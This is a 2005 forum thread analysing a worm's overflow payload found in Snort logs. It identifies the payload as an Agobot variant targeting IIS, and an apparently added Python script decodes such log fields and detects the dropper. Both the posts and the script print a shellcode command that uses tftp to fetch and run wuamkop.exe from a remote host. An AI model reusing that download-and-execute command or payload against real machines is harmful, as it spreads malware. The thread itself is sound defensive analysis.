Short exploit investigation...

Started by iago, June 09, 2005, 06:41:12 PM



iago

I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:

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

This was coming from all over, and looks like an exploit.  Something that doesn't belong.  So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):

AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#


What it looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit

Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program.  (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected :P)

A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/

Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant

Conclusion: It's an AGOBOT worm/trojan spreading itself using a web server vulnerability.  I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm) :)

Hope that somebody found that interesting.

Quik

There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.

[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.

iago

It was on "incidents".  And that is a sdbot variant, this is agobot.  Same exploit, though

iago

Here are a couple graphs of this attack:

The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html

The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html

As you can see, it's only really been around since the 6th, and it looks like it already peaked.  In another week, I'll see how it looks again.

deadly7

Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

Krazed

Quote from: deadly7 on June 13, 2005, 10:42:37 AM
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.

Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.

iago

Yeah, I'm assuming it's just a plain worm.  It randomly either picks an ip or, like Archon said, scans a subnet.

mynameistmp

What was the command string that you used to run that through your decoder?

iago

It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u.  I think you can also use uuencode somehow.
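The procedure iago describes in the first post (base64-decode the captured field, run `strings` over the result, read off the dropper command) and the `mimencode -u` step asked about here, written out as one Python script. This is an added example, not code from the original post: the payload it decodes is constructed to have the same shape as the one above (a run of 'A's, a few non-printable bytes, the `cmd /c tftp ...` string, padding 'B's) but is not the real shellcode, the IP in it is a documentation address rather than the one from the logs, and the helper names (`decode_b64_lenient`, `extract_strings`, `longest_byte_run`, `find_dropper`) are my own. It also adds two checks a practitioner would want on top of the manual steps: tolerant decoding of log fields with broken padding or line wrapping, and a longest-repeated-byte measure as a cheap "is this a sled/overflow attempt" indicator.

```python
import base64
import re

# Constructed sample, not the real worm payload from the logs: same shape
# (a run of 'A's, a few shellcode-like non-printable bytes, the dropper
# command, then padding 'B's), but the IP is an RFC 5737 documentation
# address and the bytes between the runs are arbitrary filler.
_CONSTRUCTED_PAYLOAD = (
    b"A" * 25
    + bytes([0xC4, 0x54, 0xF2, 0xFF, 0xFF, 0xFC, 0xE8, 0x46, 0x00, 0x00, 0x00, 0xEB])
    + b"cmd /c tftp -i 192.0.2.10 GET wuamkop.exe&start wuamkop.exe&exit"
    + b"\x00"
    + b"B" * 200
)
SAMPLE_LOG_FIELD = base64.b64encode(_CONSTRUCTED_PAYLOAD).decode("ascii")
# A harmless request, also constructed, for the negative case.
BENIGN_FIELD = base64.b64encode(b"GET /index.html HTTP/1.0\r\n\r\n").decode("ascii")

# Printable ASCII as strings(1) sees it: space (0x20) through '~' (0x7E).
_PRINTABLE = set(range(0x20, 0x7F))

# The dropper shape from the post: tftp -i <ip> GET <file>, with whatever
# follows (&start ..., &exit) ignored.
DROPPER_RE = re.compile(
    r"tftp\s+-i\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(?P<file>[^\s&]+)",
    re.IGNORECASE,
)


def decode_b64_lenient(field: str) -> bytes:
    """base64-decode a log field, tolerating line wraps, stray characters and
    missing '=' padding (what `mimencode -u` or `base64 -d` would do)."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", field)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Behave like strings(1): return runs of at least min_len printable bytes."""
    found, run = [], bytearray()
    for b in data:
        if b in _PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def longest_byte_run(data: bytes) -> tuple:
    """(byte, length) of the longest run of one repeated byte. A long run of a
    single byte is the usual sled/padding signature of an overflow attempt."""
    best_byte, best_len, cur_byte, cur_len = None, 0, None, 0
    for b in data:
        cur_byte, cur_len = (b, cur_len + 1) if b == cur_byte else (b, 1)
        if cur_len > best_len:
            best_byte, best_len = cur_byte, cur_len
    return best_byte, best_len


def find_dropper(field: str):
    """Decode one captured field and pull out the tftp dropper command, if any."""
    data = decode_b64_lenient(field)
    for s in extract_strings(data):
        m = DROPPER_RE.search(s)
        if m:
            return {"ip": m.group("ip"), "file": m.group("file"), "command": s}
    return None


if __name__ == "__main__":
    for name, field in (("sample", SAMPLE_LOG_FIELD), ("benign", BENIGN_FIELD)):
        data = decode_b64_lenient(field)
        print(name, "longest run:", longest_byte_run(data), "dropper:", find_dropper(field))
```

Run it as-is to see the constructed sample flagged and the benign request not; to use it on a real capture, pass the base64 field from the Snort or Apache log line to `find_dropper`. The extracted IP and filename are what you would feed into a block list or a lookup like the one in the first post.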

GameSnake

Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the server's FTP - and why would I care if I was on Linux Red Hat Apache, I can control access, can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious because I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

iago

Quote from: GameSnake on August 16, 2005, 11:30:53 PM
Interesting, is this an exploit in 1.02+?

How does the virus get to the point where it can reach the server's FTP - and why would I care if I was on Linux Red Hat Apache, I can control access, can't I, how does it exploit me. It uploads an exe and runs it too (right?).

Just curious because I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.

You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected.  I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so.  There aren't any .exe's on Red Hat, so I wouldn't worry about that. 

GameSnake

nvm, issue cleared up